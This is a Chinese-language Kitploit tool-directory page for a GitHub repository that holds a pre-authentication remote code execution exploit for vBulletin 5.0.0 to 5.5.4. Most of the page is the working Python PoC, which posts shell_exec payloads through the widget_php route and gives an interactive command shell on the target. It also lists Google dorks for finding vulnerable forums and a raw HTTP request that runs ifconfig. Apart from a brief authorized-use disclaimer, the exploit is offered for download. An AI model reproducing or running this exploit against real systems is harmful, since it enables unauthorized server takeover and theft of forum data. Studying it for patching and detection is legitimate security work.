Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/ianxtianxt/vbulletin-5.x-0day-pre-auth-rce-exploit
漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试
GitHubianxtianxt/vbulletin-5.x-0day-pre-auth-rce-exploit

vBulletin-5.x-0day-pre-auth-RCE-exploit

针对vBulletin 5.x(5.0.0至5.5.4版本)的预认证远程代码执行漏洞利用。通过widget_php小部件提供shell。仅用于授权的安全测试。

查看仓库

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
416年前尚未审核
分享

vBulletin-5.x-0day-pre-auth-RCE-exploit

影响版本:vBulletin 5.0.0~5.5.4

poc如下:

#!/usr/bin/python

vBulletin 5.x 0day pre-auth RCE exploit

This should work on all versions from 5.0.0 till 5.5.4

Google Dorks:

- site:*.vbulletin.net

- "Powered by vBulletin Version 5.5.4"

import requests

import sys

if len(sys.argv) != 2:

sys.exit("Usage: %s " % sys.argv[0])

params = {"routestring":"ajax/render/widget_php"}

while True:

root@kitploit:~
try:

     cmd = raw_input("vBulletin$ ")

     params["widgetConfig[code]"] = "echo shell_exec('"+cmd+"'); exit;"

     r = requests.post(url = sys.argv[1], data = params)

     if r.status_code == 200:

          print r.text

     else:

          sys.exit("Exploit failed! :(")

except KeyboardInterrupt:

     sys.exit(" Closing shell...")

except Exception, e:

     sys.exit(str(e))

POST / HTTP/1.1

Host: *

Content-Type: application/x-www-form-urlencoded

Content-Length: 108

routestring=ajax%2Frender%2Fwidget_php&widgetConfig%5Bcode%5D=echo+shell_exec%28%27ifconfig%27%29%3B+exit%3B

下载工具